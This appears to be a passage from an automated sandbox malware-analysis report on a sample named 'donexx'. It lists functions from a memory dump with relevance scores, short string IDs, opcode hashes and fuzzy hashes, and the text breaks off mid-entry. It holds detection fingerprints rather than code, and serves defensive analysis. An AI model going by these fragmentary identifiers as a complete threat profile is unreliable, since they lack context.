                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A36040 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: ba8482355b9354b18514be5d72cb93e05f423f92fb56fced07a56b47b7515710
                                                                            • Instruction ID: 540524b6bbaf5074f0ed42396f9b673ee862b51bb5988bc2ad97db667ffcd4f8
                                                                            • Opcode Fuzzy Hash: ba8482355b9354b18514be5d72cb93e05f423f92fb56fced07a56b47b7515710
                                                                            • Instruction Fuzzy Hash: 02918136F101259FD715DB69D980B5EB7F3AFC8710F1A8164E409DB3A9DE709C028B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A35289 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 45ab11b10ff90e9c8e6c6e1d9dd848b126b7d247b5472e51774da4fd8100644e
                                                                            • Instruction ID: 395d19dfcf258253e243a8594c8058e78eb810b5818049193adc7f647412bdfe
                                                                            • Opcode Fuzzy Hash: 45ab11b10ff90e9c8e6c6e1d9dd848b126b7d247b5472e51774da4fd8100644e
                                                                            • Instruction Fuzzy Hash: D5917D34E11229CFDB14DF79D884AAEB7F2FFC8304F158969E405AB255DB34A902CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A352D2 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 6a589667ff79670e4b4afe6cb5fb18e0558cb60523964c45c46c225600cf55fc
                                                                            • Instruction ID: 9cd9a5646dfd252e5178e98f26ed45d622bdba70849525b9064975f67106de4d
                                                                            • Opcode Fuzzy Hash: 6a589667ff79670e4b4afe6cb5fb18e0558cb60523964c45c46c225600cf55fc
                                                                            • Instruction Fuzzy Hash: 06916D35E11229CFDB14DF79D884AAEB7F2FFC8304F558929E405AB255DB34A902CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A35AEB Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 09ce03d57882d5b4aa2b93ca4270d5477c0d848acf134895fc922df9da6de1d5
                                                                            • Instruction ID: b223a1e58cf27274ed7eb970eee0cb20c034e5fba67707b68171cc9a2d8da419
                                                                            • Opcode Fuzzy Hash: 09ce03d57882d5b4aa2b93ca4270d5477c0d848acf134895fc922df9da6de1d5
                                                                            • Instruction Fuzzy Hash: 8B916D70E002598FDB15DF69C9C0BADB7B2FF88304F69C568E015AB295DB34A986CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A30F38 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq
                                                                            • API String ID: 0-665751991
                                                                            • Opcode ID: 722b082ff9d3210c175006f79f7c4a8fe6dc2fc2d885b0ed7a975961f66bba79
                                                                            • Instruction ID: 44a29908519b465b0082b61b050ecf1f99422d09feed0e14f330415298cf18f6
                                                                            • Opcode Fuzzy Hash: 722b082ff9d3210c175006f79f7c4a8fe6dc2fc2d885b0ed7a975961f66bba79
                                                                            • Instruction Fuzzy Hash: 7C718135A041458FCB05CB68C884AAEB7B5BF49710F2085AAF029EB3A5DB35DC45CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A377B0 Relevance: 5.4, Strings: 4, Instructions: 376COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$TJeq$TJeq$Te`q
                                                                            • API String ID: 0-1111236950
                                                                            • Opcode ID: b3875aafb68d7afed57c1ab056e601495afd7165e3f3e311914dc1af0664bc5f
                                                                            • Instruction ID: 3297bdbc850d2d22665fb0963d5db7b47813a0c3b51d21e5ad43b3a113a67d77
                                                                            • Opcode Fuzzy Hash: b3875aafb68d7afed57c1ab056e601495afd7165e3f3e311914dc1af0664bc5f
                                                                            • Instruction Fuzzy Hash: DAE15CB4B041448FDB46DFA8D894B6EBBF2AF49310F1584A9F4069B3A1CE35DC46CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A31210 Relevance: 5.4, Strings: 4, Instructions: 357COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$TJeq$TJeq$Te`q
                                                                            • API String ID: 0-1111236950
                                                                            • Opcode ID: 4dad587838214c85ca3bb797eae815894bc7577b3d8ecbd0be4e5de79f8014aa
                                                                            • Instruction ID: b59c788185efb36dd4033cd1bf54ea36bbc0bc678b715cf2bda587ed807db1d3
                                                                            • Opcode Fuzzy Hash: 4dad587838214c85ca3bb797eae815894bc7577b3d8ecbd0be4e5de79f8014aa
                                                                            • Instruction Fuzzy Hash: 1BE15974A042448FDB05DBA8D594BAEBBF2EF49310F1984A9E40ADB3A1DB34DC46CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3A360 Relevance: 5.2, Strings: 4, Instructions: 216COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q$$`q
                                                                            • API String ID: 0-3426633177
                                                                            • Opcode ID: a1ee2900a050d8d91f7c06f34f0c8b89f248abd0231ebd1af082cd8fd84d9f92
                                                                            • Instruction ID: af774eb8a9864fd72129c0f9ecdd99237e0d6217db156c9991c1cff025694f39
                                                                            • Opcode Fuzzy Hash: a1ee2900a050d8d91f7c06f34f0c8b89f248abd0231ebd1af082cd8fd84d9f92
                                                                            • Instruction Fuzzy Hash: B061F631B452218FC7199A384D50B2F76F7AB89320F254579E44ADB3E6DE30CD4287D2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A327B1 Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q$$`q
                                                                            • API String ID: 0-3426633177
                                                                            • Opcode ID: 7d6873abac970e17cfcdb5dc3ae9960547f19234a0b9d61efd7abbc75c61f26e
                                                                            • Instruction ID: 7c6e2d91b9fe870247235e918a96e6789dcf415021037e9142eb25ced047f99c
                                                                            • Opcode Fuzzy Hash: 7d6873abac970e17cfcdb5dc3ae9960547f19234a0b9d61efd7abbc75c61f26e
                                                                            • Instruction Fuzzy Hash: B961B130B042058FD7299B398950B6A7BB7BB85310F24897AED069B3E9DE31DD42C791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A34B47 Relevance: 3.8, Strings: 3, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: fe27156b74e7feb30db70ddf93504e602ba6610da4ff66f6cfbc71ad571e2c9e
                                                                            • Instruction ID: 528c840bd7e1a363d9cdb3f7e2f5890adac795176ac4de4de55c1141af059e90
                                                                            • Opcode Fuzzy Hash: fe27156b74e7feb30db70ddf93504e602ba6610da4ff66f6cfbc71ad571e2c9e
                                                                            • Instruction Fuzzy Hash: 1C314C70A1024A9FCB08EFB4D5519AEBBB6FF88300F104969D115A7294DB355A46CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A34B58 Relevance: 3.8, Strings: 3, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: b0a9dfe131fa1a54e7797d90231746510c8712e4e0180479d22dbf5147fd60d2
                                                                            • Instruction ID: c9c31638a471a9aabbee81df5b39dcaccebe4fd49390b0823a2b8ebb11ccacb8
                                                                            • Opcode Fuzzy Hash: b0a9dfe131fa1a54e7797d90231746510c8712e4e0180479d22dbf5147fd60d2
                                                                            • Instruction Fuzzy Hash: 58214B70E1024E9FCB08EFB4D5509AEBBB6FF88300F504969D119A72A4DB356A46CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3E088 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq$Hdq
                                                                            • API String ID: 0-3598684399
                                                                            • Opcode ID: 4b3833aedc92a71e9215d9e93c350c9f6a844783e834d6aebe8f4135c47427ff
                                                                            • Instruction ID: 5a219e5d31e928c7e07121e06da205022fba39fd3046f8116492012b34311211
                                                                            • Opcode Fuzzy Hash: 4b3833aedc92a71e9215d9e93c350c9f6a844783e834d6aebe8f4135c47427ff
                                                                            • Instruction Fuzzy Hash: F941E2712007548FD325DF39D59031BBBE2AF94310F10C92EE84A8B7A9EF74D9498B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3DF00 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq$px
                                                                            • API String ID: 0-3055188975
                                                                            • Opcode ID: a5bc3c163c9eb21ec5de4a8004d6a574adc151817e3d4a3a630c5e9d91f18f64
                                                                            • Instruction ID: b2530a1d40da463071bc46cd1119694289b0bc63992b2ad496fcbcff66ba6dd0
                                                                            • Opcode Fuzzy Hash: a5bc3c163c9eb21ec5de4a8004d6a574adc151817e3d4a3a630c5e9d91f18f64
                                                                            • Instruction Fuzzy Hash: 953159367002918BD70A5B78D8917AB7FA2DF86360F45407BF905CB395EE318C01C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A30A50 Relevance: 2.6, Strings: 2, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: 6a2f773e2c6b01e4bbcac5ad4e5cf73619cd1d27c282521582dcd30ba408046d
                                                                            • Instruction ID: 69f7dc9938606d8a3368c61a78127e9aaa4fb3ee82f9f4e6f848681a18cfa44b
                                                                            • Opcode Fuzzy Hash: 6a2f773e2c6b01e4bbcac5ad4e5cf73619cd1d27c282521582dcd30ba408046d
                                                                            • Instruction Fuzzy Hash: B821A370B002089FDB49AFB9C5A47AEBAF7AFC8700F10442DE402E7394DE718C498B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A34D40 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q$hG
                                                                            • API String ID: 0-417629503
                                                                            • Opcode ID: d4276bc040f46a3a7ff724166ee77ede5e2e02b6d966a4b4944bd88f8cfaef31
                                                                            • Instruction ID: e36d9d02731a29a7d41dbbbaff19f912bc14dcba2db2f38a56ec7b2af4292236
                                                                            • Opcode Fuzzy Hash: d4276bc040f46a3a7ff724166ee77ede5e2e02b6d966a4b4944bd88f8cfaef31
                                                                            • Instruction Fuzzy Hash: 1E214134A0438A9FCB15DBB4D15017E3FF0EF45304B2098EAD009CF2A6EE359D428781
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A30A60 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: e9a945efcdfcf62fbbc334bdec93ebc2dd310a253c1f3437a239a92736c10927
                                                                            • Instruction ID: 15e8aa0f71484d93916988bcffe6cc6c21b9a2ca6aec398982c004c66fb8f194
                                                                            • Opcode Fuzzy Hash: e9a945efcdfcf62fbbc334bdec93ebc2dd310a253c1f3437a239a92736c10927
                                                                            • Instruction Fuzzy Hash: 84218070B102189FCB09AFB9C5A47AEBAF7AFC8700F50446DE106E7394DE758C058B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A387C8 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: 8d4d4bb4f37beaaa6d6ceb19f54edff94cb76d9921c685d7603dbc8eca752af4
                                                                            • Instruction ID: 85c305773436f54954a120ec89bab612dd0d04d85c492ab9dd4ce529456777ea
                                                                            • Opcode Fuzzy Hash: 8d4d4bb4f37beaaa6d6ceb19f54edff94cb76d9921c685d7603dbc8eca752af4
                                                                            • Instruction Fuzzy Hash: 914288B0911241CFF345EF05D688A5ABBF2FB00344F56C1A8E1295F266D7BAD889CF84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3FC20 Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: ab634b19af3eade41aa958b9fdd8437d3d276e271b126a50b971b6f288ab6ba4
                                                                            • Instruction ID: b39faa209984dfe658d639316c64518422e8ca48c652034f51787280fe732c69
                                                                            • Opcode Fuzzy Hash: ab634b19af3eade41aa958b9fdd8437d3d276e271b126a50b971b6f288ab6ba4
                                                                            • Instruction Fuzzy Hash: 2D71AD75B107159FCB159F68D8486AEBBF2BF88310F14842EE91ADB780DF30A905CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A38408 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: 5573b5df70d17a30405979e19b7baf43aace759639d17db1c0742f8ce3636c55
                                                                            • Instruction ID: 5770198735c1575d20c8f70e0128462cdd1a9cb194755e9145ae1604bf734209
                                                                            • Opcode Fuzzy Hash: 5573b5df70d17a30405979e19b7baf43aace759639d17db1c0742f8ce3636c55
                                                                            • Instruction Fuzzy Hash: DCB18D71A04605CFDB16CFA9D990AAEB7B2FF84310F14892AF4169B751CF38E845CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A391C0 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: d92101bdf629928286559479887dbb6b8e6c9f3a8cf25329d16395c4294003cc
                                                                            • Instruction ID: 378d32404e48d0df6e6be074fa829251204e1325d5d3ce23f0741727ad8db785
                                                                            • Opcode Fuzzy Hash: d92101bdf629928286559479887dbb6b8e6c9f3a8cf25329d16395c4294003cc
                                                                            • Instruction Fuzzy Hash: DAA15171E0860A8FCB02DFA8C880BEFFBB5FF49300F148569E545AB251DBB49945CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A39350 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: d37770b4c88a387a6db720cbe4397b44ee70317180a0187e62cde279c3919b87
                                                                            • Instruction ID: d92f27af78455d958ef1e73021e4e482937bc076731f3cfa907857f698c23bc5
                                                                            • Opcode Fuzzy Hash: d37770b4c88a387a6db720cbe4397b44ee70317180a0187e62cde279c3919b87
                                                                            • Instruction Fuzzy Hash: EBA17371A0461ACFDB02DFA8D890BAFB7B5FF48304F05C569E805AB241DB74E985CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A30F88 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq
                                                                            • API String ID: 0-665751991
                                                                            • Opcode ID: d3326c52150963ec0bbe961e02b37f55b1d57c258d584f2eb935f1023a457e25
                                                                            • Instruction ID: 38aed71b498b590ea4bb22975272a6e52fe72c007952e8db4a45f9ca71c7be42
                                                                            • Opcode Fuzzy Hash: d3326c52150963ec0bbe961e02b37f55b1d57c258d584f2eb935f1023a457e25
                                                                            • Instruction Fuzzy Hash: 4B516D35A041058FCB05CBA8C884AAEB7F5FF49710F10866AF02ABB3A0CB359D05CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3D670 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: 5fee970c76de50c20f85d320f48816097e5afcc6aab4720e7ed4b4dfd25e7699
                                                                            • Instruction ID: b281412070bcb8ab7b7c2311af754bb6cbaf085155a32ddb6eec6afe3bd18314
                                                                            • Opcode Fuzzy Hash: 5fee970c76de50c20f85d320f48816097e5afcc6aab4720e7ed4b4dfd25e7699
                                                                            • Instruction Fuzzy Hash: 36512E76610100AFCB459FA8C945D6A7FB7FF8D3147168098E6099B376DB32DC22EB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A381C8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: f230d8c4635a4abbd37bbeb49026bd05c189d0ec1985f22784e78d678cf05b72
                                                                            • Instruction ID: cd764c2a3013530f5730a5bbb7f12f95a23c847e683257b14d626d8bab3e03e3
                                                                            • Opcode Fuzzy Hash: f230d8c4635a4abbd37bbeb49026bd05c189d0ec1985f22784e78d678cf05b72
                                                                            • Instruction Fuzzy Hash: E8514670A04B04CFD726CFAAD444766F7B5FB84301F00896AF46687790EB39E886CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A39341 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q
                                                                            • API String ID: 0-2689856827
                                                                            • Opcode ID: 8ab6f7ec849ebeffe8613753e48f32f68fa89aa634b3ffc95fe506de772d11e8
                                                                            • Instruction ID: 59b5d52b5e5acff4cf980ccb7527b18a16a0f5ed545fbdaa48812801c7a0f148
                                                                            • Opcode Fuzzy Hash: 8ab6f7ec849ebeffe8613753e48f32f68fa89aa634b3ffc95fe506de772d11e8
                                                                            • Instruction Fuzzy Hash: 04514F71A0410A8BDB42CFA8D480BEFB7B5FF48300F14C569F415AB281DBB1D985CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A317D0 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D@
                                                                            • API String ID: 0-2222373746
                                                                            • Opcode ID: 0dfa8c531e985bd979b9b012110171dfda02469d76fc9a17ef474bcec2c977e2
                                                                            • Instruction ID: d9362829e2ef04046d168dc61554998223883463bd242ce41729a500395d477f
                                                                            • Opcode Fuzzy Hash: 0dfa8c531e985bd979b9b012110171dfda02469d76fc9a17ef474bcec2c977e2
                                                                            • Instruction Fuzzy Hash: A7418D31F102068FCB4AEB758855ABB77B2FBC5300B148569E50997298EF30D942C795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3E690 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: f1528ef6e2686da24f196340a71e2467f0d109e88b435bb29480f1759853408b
                                                                            • Instruction ID: d617466ae5855c40be63f59f898667861c80a884cccb12d039bf34897ef41841
                                                                            • Opcode Fuzzy Hash: f1528ef6e2686da24f196340a71e2467f0d109e88b435bb29480f1759853408b
                                                                            • Instruction Fuzzy Hash: 2141BD35A00616CFCB01CF68C584A6AFBB1FF49320F158699EA299B391DB30ED51CBD0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A3CA00 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: cf7fab77fa4f2d20edbe0844dbcedf359e81a3f2547147dcc51b4452e1c648fb
                                                                            • Instruction ID: 5481a797613b40cf213057480178166bc1ecad98d5dd1cce73fe4a867056255d
